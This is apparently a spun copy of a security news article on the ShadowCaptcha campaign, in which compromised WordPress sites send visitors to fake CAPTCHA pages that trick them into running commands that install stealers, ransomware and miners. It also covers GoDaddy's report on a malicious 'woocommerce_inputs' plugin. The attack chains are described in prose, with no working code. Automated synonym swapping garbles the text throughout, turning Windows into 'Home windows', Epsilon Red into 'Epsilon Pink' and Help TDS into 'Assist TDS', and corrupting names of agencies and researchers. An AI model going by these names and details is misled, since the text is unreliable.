A brand new large-scale marketing campaign has been noticed exploiting over 100 compromised WordPress websites to direct website guests to pretend CAPTCHA verification pages that make use of the ClickFix social engineering tactic to ship data stealers, ransomware, and cryptocurrency miners.
The big-scale cybercrime marketing campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel Nationwide Digital Company.
“The marketing campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload supply to realize and preserve a foothold in focused techniques,” researchers Shimi Cohen, Adi Choose, Idan Beit Yosef, Hila David, and Yaniv Goldman stated.
“The final word targets of ShadowCaptcha are amassing delicate data by way of credential harvesting and browser information exfiltration, deploying cryptocurrency miners to generate illicit earnings, and even inflicting ransomware outbreaks.”
The assaults start with unsuspecting customers visiting a compromised WordPress web site that has been injected with malicious JavaScript code that is chargeable for initiating a redirection chain that takes them to a pretend Cloudflare or Google CAPTCHA web page.
From there, the assault chain forks into two, relying on the ClickFix directions displayed on the net web page: One which makes use of the Home windows Run dialog and one other that guides the sufferer to save lots of a web page as an HTML Software (HTA) after which run it utilizing mshta.exe.
The execution stream triggered through the Home windows Run dialog culminates within the deployment of Lumma and Rhadamanthys stealers through MSI installers launched utilizing msiexec.exe or by way of remotely-hosted HTA recordsdata run utilizing mshta.exe, whereas the execution of the saved HTA payload leads to the set up of Epsilon Pink ransomware.
It is value declaring that using ClickFix lures to trick customers into downloading malicious HTA recordsdata for spreading Epsilon Pink ransomware was documented final month by CloudSEK.
“The compromised ClickFix web page routinely executes obfuscated JavaScript that makes use of ‘navigator.clipboard.writeText’ to repeat a malicious command to the consumer’s clipboard with none interplay, counting on customers to stick and run it unknowingly,” the researchers stated.
The assaults are characterised by means of anti-debugger methods to forestall inspection of internet pages utilizing browser developer instruments, whereas additionally counting on DLL side-loading to execute malicious code beneath the guise of authentic processes.
Choose ShadowCaptcha campaigns have noticed delivering an XMRig-based cryptocurrency miner, with some variants fetching the mining configuration from a Pastebin URL fairly than hard-coding it within the malware, thus permitting them to regulate the parameters on the fly.
In instances the place the miner payloads are deployed, the attackers have additionally been noticed dropping a susceptible driver (“WinRing0x64.sys”) to attain kernel-level entry and work together with CPU registers with an intention to enhance mining effectivity.
Of the contaminated WordPress websites, a majority of them are positioned in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning know-how, hospitality, authorized/finance, healthcare, and actual property sectors.
Precisely how these WordPress websites are compromised shouldn’t be identified. Nonetheless, Goldman instructed The Hacker Information there may be medium confidence that the attackers obtained entry by way of varied identified exploits in a wide range of plugins, and in some cases utilizing the WordPress portal with compromised credentials.
To mitigate the dangers posed by ShadowCaptcha, it is important to coach customers to be careful for ClickFix campaigns, section networks to forestall lateral motion, and guarantee WordPress websites are stored up-to-date and secured utilizing multi-factor authentication (MFA) protections.
“ShadowCaptcha exhibits how social-engineering assaults have advanced into full-spectrum cyber operations,” the researchers stated. “By tricking customers into operating built-in Home windows instruments and layering obfuscated scripts and susceptible drivers, operators achieve stealthy persistence and may pivot between information theft, crypto mining, or ransomware.”
The disclosure comes as GoDaddy detailed the evolution of Assist TDS, a visitors distribution (or path) system that has been energetic since 2017 and has been linked to malicious schemes like VexTrio Viper. Assist TDS supplies companions and associates with PHP code templates which might be injected into WordPress websites, finally directing customers to malicious locations based mostly on the focusing on standards.
“The operation focuses on tech assist scams using full-screen browser manipulation and exit prevention methods to lure victims on fraudulent Microsoft Home windows safety alert pages, with fallback monetization by way of relationship, cryptocurrency, and sweepstakes scams,” safety researcher Denis Sinegubko stated.
A number of the notable malware campaigns which have leveraged Assist TDS lately embody DollyWay, Balada Injector, and DNS TXT redirects. The rip-off pages, for his or her half, use JavaScript to power browsers to enter full-screen mode and show the fraudulent alert and even function counterfeit CAPTCHA challenges earlier than rendering them in a bid to sidestep automated safety scanners.
Assist TDS operators are stated to have developed a malicious WordPress plugin referred to as “woocommerce_inputs” between late 2024 and August 2025 to allow the redirection performance, alongside steadily including credential harvesting, geographic filtering, and superior evasion methods. The plugin is estimated to be put in on over 10,000 websites worldwide.
The malicious plugin masquerades as WooCommerce to evade detection by website house owners. It is completely put in by attackers after compromising WordPress websites by way of stolen administrator credentials.
“This plugin serves as each a visitors monetization device and credential harvesting mechanism, demonstrating steady evolution from easy redirect performance to a complicated malware-as-a-service providing,” GoDaddy stated.
“By offering ready-made options together with C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Assist TDS has lowered the barrier to entry for cybercriminals looking for to monetize infiltrated web sites.”
